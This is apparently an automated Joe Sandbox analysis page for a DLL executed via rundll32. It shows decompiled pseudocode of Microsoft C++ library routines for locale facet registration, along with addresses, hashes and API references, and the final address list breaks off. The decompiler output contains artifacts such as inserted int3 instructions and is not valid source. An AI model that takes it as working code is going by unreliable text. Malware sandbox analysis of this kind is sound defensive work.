Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!'n$0!'n
API String ID: 1286116820-1210743812
Opcode ID: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
Instruction ID: d25bdfec5466c19293491472b3e610894336dc36d7c6d903214690091bb99764
Opcode Fuzzy Hash: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
Instruction Fuzzy Hash: 1A51D77181061EEFDB48DFF9CD449AAB7BFAB41710B100A7AE411E7390D7B09A50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E6E20FC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6e20fc89
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcba
0x6e20fcbf
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7

APIs

__EH_prolog3.LIBCMT ref: 6E20FC90
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FC9A
int.LIBCPMT ref: 6E20FCB1

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FD29

Strings

`m,n, xrefs: 6E20FCA5

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `m,n
API String ID: 651022567-3377878941
Opcode ID: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
Instruction ID: 70e9a397f8daf559b16a6cef501db3e2e9ae6d66d710fdfc6a7615a233d05766
Opcode Fuzzy Hash: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
Instruction Fuzzy Hash: CE11067590052DCBCF00EBE0CC94AEEB77BBF45714F240908E4106B2D0DBB49A44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E6E21BB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t110 - 0x14, 0);
				_t105 =  *0x6e2c6e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1E161C(0x6e2c6e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E2066BA(_t110 - 0x14);
					return E6E220075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E21C229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t110 - 0x20);
							E6E223D74(_t110 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t102, _t105, 0x14);
							E6E206653(_t110 - 0x14, 0);
							_t106 =  *0x6e2c6e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1E161C(0x6e2c6e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E2066BA(_t110 - 0x14);
								return E6E220075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E21C295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1E1438(_t93);
										E6E223D74(_t110 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e26851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e26c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E21D028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E220075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E206FD3(__eflags, _t103);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e2c6e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E206FD3(__eflags, _t102);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e2c6e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6e21bb30
0x6e21bb37
0x6e21bb41
0x6e21bb46
0x6e21bb51
0x6e21bb55
0x6e21bb58
0x6e21bb5d
0x6e21bb61
0x6e21bb66
0x6e21bb6a
0x6e21bbaf
0x6e21bbb2
0x6e21bbbe
0x6e21bb6c
0x6e21bb6e
0x6e21bb74
0x6e21bb7a
0x6e21bb82
0x6e21bb85
0x6e21bbc2
0x6e21bbd0
0x6e21bbd5
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc0c
0x6e21bc0e
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14
0x6e21bb87
0x6e21bb87
0x6e21bb8a
0x6e21bb8e
0x6e21bb92
0x6e21bb9f
0x6e21bba7
0x6e21bba9
0x00000000
0x6e21bba9
0x6e21bb70
0x6e21bb70
0x00000000
0x6e21bb70
0x6e21bb6e

APIs

__EH_prolog3.LIBCMT ref: 6E21BB37
std::_Lockit::_Lockit.LIBCPMT ref: 6E21BB41
int.LIBCPMT ref: 6E21BB58

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21BB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BBD0

Strings

n,n, xrefs: 6E21BB4C

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: n,n
API String ID: 651022567-1342484985
Opcode ID: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
Instruction ID: 5837456fd597e2c1d6db6faa0fd0dad6903885155175de41ff1d125d22556f3b
Opcode Fuzzy Hash: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
Instruction Fuzzy Hash: E7110E79A0051ECBCF00EBE0C894AEDB7BBAF44B14F100919E511AB3D0DBB49B40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E6E21BBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21C295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21D028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6e21bbd6
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc07
0x6e21bc0c
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14

APIs

__EH_prolog3.LIBCMT ref: 6E21BBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6E21BBE7
int.LIBCPMT ref: 6E21BBFE

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21BC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BC76

Strings

$n,n, xrefs: 6E21BBF2

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $n,n
API String ID: 651022567-3748013742
Opcode ID: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
Instruction ID: a6547bb170d677b3cbd03c7a0d613a1b2f3d707285ca525e638e82ef695a7e22
Opcode Fuzzy Hash: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
Instruction Fuzzy Hash: E2110E79A0052ECFCB00DBE4C898AEDB7BBAF84B04F140909E110AB390DFB49A40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E2113A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E211409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E211471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E2114EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E211558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E2115C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6e20f8a5
0x6e20f8a5
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8d6
0x6e20f8db
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
